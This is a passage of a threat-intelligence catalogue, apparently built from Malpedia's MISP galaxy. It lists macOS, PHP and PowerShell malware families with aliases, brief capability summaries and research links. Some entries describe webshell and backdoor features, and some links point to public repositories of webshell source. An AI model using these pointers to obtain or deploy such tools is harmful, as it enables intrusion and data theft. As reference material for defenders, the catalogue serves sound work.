https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html
https://objective-see.com/blog/blog_0x16.html
http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf
http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/

Laoshu

The tag is: misp-galaxy:malpedia="Laoshu"

Laoshu is also known as:

Table 1221. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.laoshu
https://objective-see.com/blog/blog_0x16.html
https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/

Leverage

The tag is: misp-galaxy:malpedia="Leverage"

Leverage is also known as:

Table 1222. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.leverage
https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis
https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/

MacDownloader

The tag is: misp-galaxy:malpedia="MacDownloader"

MacDownloader is also known as:

Table 1223. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.macdownloader
https://www.secureworks.com/research/threat-profiles/cobalt-gypsy
https://iranthreats.github.io/resources/macdownloader-macos-malware/

MacInstaller

The tag is: misp-galaxy:malpedia="MacInstaller"

MacInstaller is also known as:

Table 1224. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.macinstaller
https://objective-see.com/blog/blog_0x16.html

MacRansom

The tag is: misp-galaxy:malpedia="MacRansom"

MacRansom is also known as:

Table 1225. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.macransom
https://objective-see.com/blog/blog_0x1E.html
https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service

MacSpy

The tag is: misp-galaxy:malpedia="MacSpy"

MacSpy is also known as:

Table 1226. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.macspy
https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service

MacVX

The tag is: misp-galaxy:malpedia="MacVX"

MacVX is also known as:

Table 1227. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.macvx
https://objective-see.com/blog/blog_0x16.html

MaMi

The tag is: misp-galaxy:malpedia="MaMi"

MaMi is also known as:

Table 1228. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.mami
https://objective-see.com/blog/blog_0x26.html

Manuscrypt

The tag is: misp-galaxy:malpedia="Manuscrypt"

Manuscrypt is also known as:

Table 1229. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.manuscrypt
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://twitter.com/BitsOfBinary/status/1321488299932983296
https://twitter.com/BitsOfBinary/status/1337330286787518464
https://www.anquanke.com/post/id/223817

Mokes (OS X)

The tag is: misp-galaxy:malpedia="Mokes (OS X)"

Mokes (OS X) is also known as:

Table 1230. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes
https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/
https://objective-see.com/blog/blog_0x16.html
https://objective-see.com/blog/blog_0x53.html

Mughthesec

The tag is: misp-galaxy:malpedia="Mughthesec"

Mughthesec is also known as:

Table 1231. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.mughthesec
https://objective-see.com/blog/blog_0x20.html

OceanLotus

The tag is: misp-galaxy:malpedia="OceanLotus"

OceanLotus is also known as:

Table 1232. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus
https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/
https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/
https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/
https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/
https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html
https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update
https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/
https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-t%C3%B4i-c%C3%B3-%C4%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%C3%AAn-fb-may-qu%C3%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%ACnh-g%E1%BB%ADi-cho-537b19ee3468
https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries
https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam

Olyx

The tag is: misp-galaxy:malpedia="Olyx"

Olyx is also known as:

Table 1233. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.olyx
http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html
https://news.drweb.com/show/?i=1750&lng=en&c=14

OSAMiner

The tag is: misp-galaxy:malpedia="OSAMiner"

OSAMiner is also known as:

Table 1234. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.osaminer
https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/

Patcher

This crypto-ransomware for macOS was caught spreading via BitTorrent distribution sites in February 2017, masquerading as 'Patcher', an application used for pirating popular software like Adobe Premiere Pro or Microsoft Office for Mac.

The downloaded torrent contained an application bundle in the form of a single zip file. After launching the fake application, the main window of the fake cracking tool was displayed.

The file encryption process was launched after the misguided victim clicked 'Start'. Once executed, the ransomware generated a random 25-character string and set it as the key for RC4 encryption of all of the user’s files. It then demanded ransom in Bitcoin, as instructed in the 'README!' .txt file copied all over the user’s directories.

Despite the instructions being quite thorough, Patcher lacked the functionality to communicate with any C&C server, and therefore made it impossible for its operators to decrypt affected files. The randomly generated encryption key was also too long to be guessed via a brute-force attack, leaving the encrypted data unrecoverable in a reasonable amount of time.

The tag is: misp-galaxy:malpedia="Patcher"

Patcher is also known as:

FileCoder
Findzip

Table 1235. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher
http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/

PintSized

Backdoor as a fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string.

The tag is: misp-galaxy:malpedia="PintSized"

PintSized is also known as:

Table 1236. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized
https://eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/

Pirrit

The tag is: misp-galaxy:malpedia="Pirrit"

Pirrit is also known as:

Table 1237. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit
http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/
http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://www.cybereason.com/hubfs/Content%20PDFs/OSX.Pirrit%20Part%20III%20The%20DaVinci%20Code.pdf

Proton RAT

The tag is: misp-galaxy:malpedia="Proton RAT"

Proton RAT is also known as:

Calisto

Table 1238. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat
https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does
https://blog.malwarebytes.com/threat-analysis/mac-threat-analysis/2017/11/osx-proton-spreading-through-fake-symantec-blog/
https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/
https://securelist.com/calisto-trojan-for-macos/86543/
https://threatpost.com/handbrake-for-mac-compromised-with-proton-spyware/125518/
https://objective-see.com/blog/blog_0x1F.html
https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/
https://objective-see.com/blog/blog_0x1D.html
https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf

Pwnet

Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.

The tag is: misp-galaxy:malpedia="Pwnet"

Pwnet is also known as:

Table 1239. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet
https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/

Dok

Dok a.k.a. Retefe is the macOS version of the banking trojan Retefe. It consists of a codesigned Mach-O dropper usually malspammed in an app bundle within a DMG disk image, posing as a document. The primary purpose of the dropper is to install a Tor client as well as a malicious CA certificate and proxy pac URL, in order to redirect traffic to targeted sites through their Tor node, effectively carrying out a MITM attack against selected web traffic. It also installs a custom hosts file to prevent access to Apple and VirusTotal. The macOS version shares its MO, many TTPs and infrastructure with the Windows counterpart.

The tag is: misp-galaxy:malpedia="Dok"

Dok is also known as:

Retefe

Table 1240. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe
http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/
https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe
https://www.govcert.admin.ch/blog/33/the-retefe-saga
https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/

Shlayer

The tag is: misp-galaxy:malpedia="Shlayer"

Shlayer is also known as:

Table 1241. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.shlayer
https://objective-see.com/blog/blog_0x64.html
https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf
https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508
https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/
https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/
https://us-cert.cisa.gov/ncas/alerts/aa20-345a
https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/
https://securelist.com/shlayer-for-macos/95724/

Silver Sparrow

According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple’s new M1 chips but has been distributed without payload so far.

The tag is: misp-galaxy:malpedia="Silver Sparrow"

Silver Sparrow is also known as:

Table 1242. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.silver_sparrow
https://redcanary.com/blog/clipping-silver-sparrows-wings/#technical-analysis

systemd

General purpose backdoor

The tag is: misp-galaxy:malpedia="systemd"

systemd is also known as:

Table 1243. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd
https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en

Tsunami (OS X)

The tag is: misp-galaxy:malpedia="Tsunami (OS X)"

Tsunami (OS X) is also known as:

Table 1244. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.tsunami
https://www.intego.com/mac-security-blog/tsunami-backdoor-can-be-used-for-denial-of-service-attacks

Unidentified macOS 001 (UnionCryptoTrader)

The tag is: misp-galaxy:malpedia="Unidentified macOS 001 (UnionCryptoTrader)"

Unidentified macOS 001 (UnionCryptoTrader) is also known as:

Table 1245. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.unidentified_001
https://objective-see.com/blog/blog_0x51.html
https://securelist.com/operation-applejeus-sequel/95596/

Uroburos (OS X)

The tag is: misp-galaxy:malpedia="Uroburos (OS X)"

Uroburos (OS X) is also known as:

Table 1246. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos
https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/
https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/

Vigram

The tag is: misp-galaxy:malpedia="Vigram"

Vigram is also known as:

WizardUpdate

Table 1247. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.vigram
https://twitter.com/ConfiantIntel/status/1351559054565535745

WatchCat

The tag is: misp-galaxy:malpedia="WatchCat"

WatchCat is also known as:

Table 1248. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.watchcat
https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/
https://objective-see.com/blog/blog_0x5F.html

WindTail

The tag is: misp-galaxy:malpedia="WindTail"

WindTail is also known as:

Table 1249. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.windtail
https://objective-see.com/blog/blog_0x3D.html
https://objective-see.com/blog/blog_0x3B.html
https://www.forbes.com/sites/thomasbrewster/2018/08/30/apple-mac-loophole-breached-in-middle-east-hacks/
https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56
https://gsec.hitb.org/materials/sg2018/D1%20COMMSEC%20-%20In%20the%20Trails%20of%20WINDSHIFT%20APT%20-%20Taha%20Karim.pdf
https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf
https://www.virusbulletin.com/virusbulletin/2020/04/vb2019-paper-cyber-espionage-middle-east-unravelling-osxwindtail/

Winnti (OS X)

The tag is: misp-galaxy:malpedia="Winnti (OS X)"

Winnti (OS X) is also known as:

Table 1250. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti
https://401trg.pw/winnti-evolution-going-open-source/

WireLurker (OS X)

The tag is: misp-galaxy:malpedia="WireLurker (OS X)"

WireLurker (OS X) is also known as:

Table 1251. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirelurker
https://objective-see.com/blog/blog_0x16.html
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

Wirenet (OS X)

The tag is: misp-galaxy:malpedia="Wirenet (OS X)"

Wirenet (OS X) is also known as:

Table 1252. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet
http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html
https://objective-see.com/blog/blog_0x43.html
https://news.drweb.com/show/?i=2679&lng=en&c=14

X-Agent (OS X)

The tag is: misp-galaxy:malpedia="X-Agent (OS X)"

X-Agent (OS X) is also known as:

Table 1253. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent
https://twitter.com/PhysicalDrive0/status/845009226388918273
http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/
https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf
https://www.secureworks.com/research/threat-profiles/iron-twilight

XCSSET

The tag is: misp-galaxy:malpedia="XCSSET"

XCSSET is also known as:

Table 1254. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset
https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf
https://www.trendmicro.com/en_us/research/21/g/updated-xcsset-malware-targets-telegram—other-apps.html
https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/
https://www.trendmicro.com/en_us/research/21/d/xcsset-quickly-adapts-to-macos-11-and-m1-based-macs.html
https://blog.trendmicro.com/trendlabs-security-intelligence/xcsset-mac-malware-infects-xcode-projects-performs-uxss-attack-on-safari-other-browsers-leverages-zero-day-exploits/
https://objective-see.com/blog/blog_0x5F.html
https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/

Xloader

Xloader is a Rebranding of Formbook malware (mainly a stealer), available for macOS as well.

Formbook has a "magic"-value FBNG (FormBook-NG), while Xloader has a "magic"-value XLNG (XLoader-NG). This "magic"-value XLNG is platform-independent.

Not to be confused with apk.xloader or ios.xloader.

The tag is: misp-galaxy:malpedia="Xloader"

Xloader is also known as:

Formbook

Table 1255. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader
https://twitter.com/krabsonsecurity/status/1319463908952969216
https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer
https://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/
https://www.sentinelone.com/blog/detecting-xloader-a-macos-malware-as-a-service-info-stealer-and-keylogger/
https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/
https://blog.malwarebytes.com/mac/2021/07/osx-xloader-hides-little-except-its-main-purpose-what-we-learned-in-the-installation-process/

XSLCmd

The tag is: misp-galaxy:malpedia="XSLCmd"

XSLCmd is also known as:

Table 1256. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.xslcmd
https://www.fireeye.com/blog/threat-research/2014/09/forced-to-adapt-xslcmd-backdoor-now-on-os-x.html
https://objective-see.com/blog/blog_0x16.html

Yort

The tag is: misp-galaxy:malpedia="Yort"

Yort is also known as:

Table 1257. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.yort
https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/
https://objective-see.com/blog/blog_0x53.html

ZuRu

A malware that was observed being embedded alongside legitimate applications (such as iTerm2) offered for download on suspicious websites pushed in search engines. It uses a Python script to perform reconnaissance on the compromised system an pulls additional payload(s).

The tag is: misp-galaxy:malpedia="ZuRu"

ZuRu is also known as:

Table 1258. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/osx.zuru
https://objective-see.com/blog/blog_0x66.html
https://www.trendmicro.com/en_us/research/21/i/mac-users-targeted-by-trojanized-iterm2-app.html

Ani-Shell

Ani-Shell is a simple PHP shell with some unique features like Mass Mailer, a simple Web-Server Fuzzer, Dosser, Back Connect, Bind Shell, Back Connect, Auto Rooter etc.

The tag is: misp-galaxy:malpedia="Ani-Shell"

Ani-Shell is also known as:

anishell

Table 1259. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/php.anishell
https://github.com/tennc/webshell/tree/master/php/Ani-Shell
http://ani-shell.sourceforge.net/

ANTAK

Antak is a webshell written in ASP.Net which utilizes PowerShell.

The tag is: misp-galaxy:malpedia="ANTAK"

ANTAK is also known as:

Table 1260. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/php.antak
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
https://github.com/samratashok/nishang/blob/master/Antak-WebShell/antak.aspx
http://www.labofapenetrationtester.com/2014/06/introducing-antak.html

c99shell

C99shell is a PHP backdoor that provides a lot of functionality, for example:

run shell commands;
download/upload files from and to the server (FTP functionality);
full access to all files on the hard disk;
self-delete functionality.

The tag is: misp-galaxy:malpedia="c99shell"

c99shell is also known as:

Table 1261. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/php.c99
https://bartblaze.blogspot.com/2015/03/c99shell-not-dead.html

DEWMODE

FireEye discovered the DEWMODE webshell starting mid-December 2020 after exploitation of zero-day vulnerabilities in Accellion’s File Transfer Appliance.

The tag is: misp-galaxy:malpedia="DEWMODE"

DEWMODE is also known as:

Table 1262. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode
https://go.recordedfuture.com/hubfs/reports/mtp-2021-0312.pdf
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a
https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html
https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf

Ensikology

The tag is: misp-galaxy:malpedia="Ensikology"

Ensikology is also known as:

Ensiko

Table 1263. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/php.ensikology
https://blog.trendmicro.com/trendlabs-security-intelligence/ensiko-a-webshell-with-ransomware-capabilities/

PAS

The tag is: misp-galaxy:malpedia="PAS"

PAS is also known as:

Table 1264. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/php.pas
https://securelist.com/apt-trends-report-q1-2021/101967/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf
https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm
https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity
https://blog.erratasec.com/2016/12/some-notes-on-iocs.html

RedHat Hacker WebShell

The tag is: misp-galaxy:malpedia="RedHat Hacker WebShell"

RedHat Hacker WebShell is also known as:

Table 1265. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/php.redhat_hacker
https://github.com/xl7dev/WebShell/blob/master/Asp/RedHat%20Hacker.asp

WSO

The tag is: misp-galaxy:malpedia="WSO"

WSO is also known as:

Webshell by Orb

Table 1266. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/php.wso
https://securelist.com/energetic-bear-crouching-yeti/85345/

Silence DDoS

The tag is: misp-galaxy:malpedia="Silence DDoS"

Silence DDoS is also known as:

Table 1267. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos
https://www.group-ib.com/resources/threat-research/silence.html

BONDUPDATER

The tag is: misp-galaxy:malpedia="BONDUPDATER"

BONDUPDATER is also known as:

Glimpse
Poison Frog

Table 1268. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater
https://blog.0day.rocks/hacking-back-and-influence-operations-85cd52c1e933
https://marcoramilli.com/2019/05/02/apt34-glimpse-project/
https://unit42.paloaltonetworks.com/behind-the-scenes-with-oilrig/
https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/
https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae
https://nsfocusglobal.com/apt34-event-analysis-report/
https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/
https://www.secureworks.com/research/threat-profiles/cobalt-gypsy
https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2
https://ironnet.com/blog/chirp-of-the-poisonfrog/
https://www.netscout.com/blog/asert/tunneling-under-sands

CASHY200

The tag is: misp-galaxy:malpedia="CASHY200"

CASHY200 is also known as:

Table 1269. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.cashy200
https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/

FlowerPower

The tag is: misp-galaxy:malpedia="FlowerPower"

FlowerPower is also known as:

BoBoStealer

Table 1270. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.flowerpower
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://www.youtube.com/watch?v=rfzmHjZX70s
https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf
https://vb2020.vblocalhost.com/uploads/VB2020-46.pdf
https://vblocalhost.com/uploads/VB2020-46.pdf

FRat Loader

Loader used to deliver FRat (see family windows.frat)

The tag is: misp-galaxy:malpedia="FRat Loader"

FRat Loader is also known as:

Table 1271. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.frat_loader
https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/frat.md

FTCODE

The malware ftcode is a ransomware which encrypts files and changes their extension into .FTCODE. It later asks for a ransom in order to release the decryption key, mandatory to recover your files. It is infamous for attacking Italy pretending to be a notorious telecom provider asking for due payments.

The tag is: misp-galaxy:malpedia="FTCODE"

FTCODE is also known as:

Table 1272. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ftcode
https://www.kpn.com/security-blogs/FTCODE-taking-over-a-portion-of-the-botnet.htm
https://www.zscaler.com/blogs/research/ftcode-ransomware—new-version-includes-stealing-capabilities
https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Unknown/2020-06-22/Analysis.md
https://www.certego.net/en/news/malware-tales-ftcode/
https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html
https://www.certego.net/en/news/ftdecryptor-a-simple-password-based-ftcode-decryptor/
https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/

GhostMiner

The tag is: misp-galaxy:malpedia="GhostMiner"

GhostMiner is also known as:

Table 1273. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer
https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless
https://blog.trendmicro.com/trendlabs-security-intelligence/fileless-cryptocurrency-miner-ghostminer-weaponizes-wmi-objects-kills-other-cryptocurrency-mining-payloads/
https://research.checkpoint.com/malware-against-the-c-monoculture/

JasperLoader

The tag is: misp-galaxy:malpedia="JasperLoader"

JasperLoader is also known as:

Table 1274. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.jasperloader
https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html
https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html
https://blog.talosintelligence.com/2019/05/sorpresa-jasperloader.html
https://blog.threatstop.com/upgraded-jasperloader-infecting-machines

LightBot

According to Bleeping Computer and Vitali Kremez, LightBot is a compact reconnaissance tool suspected to be used to identify high-value targets for potential follow-up ransomware attacks.

The tag is: misp-galaxy:malpedia="LightBot"

LightBot is also known as:

Table 1275. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.lightbot
https://twitter.com/VK_Intel/status/1329511151202349057
https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/

Octopus (Powershell)

The author describes Octopus as an "open source, pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S."

It is different from the malware win.octopus written in Delphi and attributed to DustSquad by Kaspersky Labs.

The tag is: misp-galaxy:malpedia="Octopus (Powershell)"

Octopus (Powershell) is also known as:

Table 1276. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.octopus
https://resources.malwarebytes.com/files/2021/02/LazyScripter.pdf
https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf
https://isc.sans.edu/diary/26918
https://github.com/mhaskar/Octopus

OilRig

The tag is: misp-galaxy:malpedia="OilRig"

OilRig is also known as:

Table 1277. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.oilrig
https://www.vkremez.com/2018/03/investigating-iranian-threat-group.html
https://twitter.com/MJDutch/status/1074820959784321026?s=19
https://threatpost.com/oilrig-apt-unique-backdoor/157646/

POSHSPY

The tag is: misp-galaxy:malpedia="POSHSPY"

POSHSPY is also known as:

Table 1278. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy
https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
https://github.com/matthewdunwoody/POSHSPY

PowerBrace

The tag is: misp-galaxy:malpedia="PowerBrace"

PowerBrace is also known as:

Table 1279. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerbrace
https://norfolkinfosec.com/osint-reporting-on-dprk-and-ta505-overlap/
https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor

PowerPepper

The tag is: misp-galaxy:malpedia="PowerPepper"

PowerPepper is also known as:

Table 1280. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpepper
https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/
https://twitter.com/InQuest/status/1285295975347650562

POWERPIPE

The tag is: misp-galaxy:malpedia="POWERPIPE"

POWERPIPE is also known as:

Table 1281. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerpipe
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html

powershell_web_backdoor

The tag is: misp-galaxy:malpedia="powershell_web_backdoor"

powershell_web_backdoor is also known as:

Table 1282. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershell_web_backdoor
https://github.com/chrisjd20/powershell_web_backdoor

PowerShower

The tag is: misp-galaxy:malpedia="PowerShower"

PowerShower is also known as:

Table 1283. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powershower
https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/
https://securelist.com/recent-cloud-atlas-activity/92016/

POWERSOURCE

POWERSOURCE is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. The backdoor uses DNS TXT requests for command and control and is installed in the registry or Alternate Data Streams.

The tag is: misp-galaxy:malpedia="POWERSOURCE"

POWERSOURCE is also known as:

Table 1284. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powersource
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

PowerSpritz

The tag is: misp-galaxy:malpedia="PowerSpritz"

PowerSpritz is also known as:

Table 1285. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerspritz
